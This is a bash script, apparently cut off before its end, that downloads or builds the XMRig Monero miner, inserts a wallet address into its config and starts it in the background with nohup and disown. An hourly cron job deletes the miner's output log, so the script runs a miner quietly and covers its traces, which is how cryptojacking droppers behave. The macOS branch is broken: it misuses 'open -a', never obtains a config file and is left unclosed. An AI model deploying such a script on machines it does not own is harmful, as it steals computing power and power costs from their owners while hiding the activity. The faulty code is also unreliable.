#!/bin/bash

# Set sending address
address="YOUR_MONERO_WALLET_ADDRESS"

# Determine operating system
os=$(uname)

if [ "$os" == "Linux" ]; then
  # Gather dependencies for Linux
  miner_url="https://github.com/xmrig/xmrig/releases/download/v6.7.1/xmrig-6.7.1-linux-x64.tar.gz"
  config_url="https://raw.githubusercontent.com/xmrig/xmrig/master/src/config.json"

  # Download miner
  wget $miner_url
  tar -xvzf xmrig-6.7.1-linux-x64.tar.gz
  rm xmrig-6.7.1-linux-x64.tar.gz

  # Download config file
  wget $config_url -O xmrig-6.7.1/config.json

  # Set sending address
  sed -i "s/YOUR_WALLET_ADDRESS/$address/g" xmrig-6.7.1/config.json

  # Start miner
  cd xmrig-6.7.1/
  chmod +x xmrig
  nohup ./xmrig --config=config.json & disown
  (crontab -l 2>/dev/null; echo "0 * * * * rm ~/xmrig-6.7.1/nohup.out") | crontab -
elif [ "$os" == "Darwin" ]; then
  # Gather dependencies for macOS
  brew install cmake libuv openssl hwloc
  git clone https://github.com/xmrig/xmrig.git
  mkdir xmrig/build && cd xmrig/build
  cmake .. -DOPENSSL_ROOT_DIR=/usr/local/opt/openssl
  make -j$(sysctl -n hw.logicalcpu)
  open -a ./xmrig --config=config.json & disown
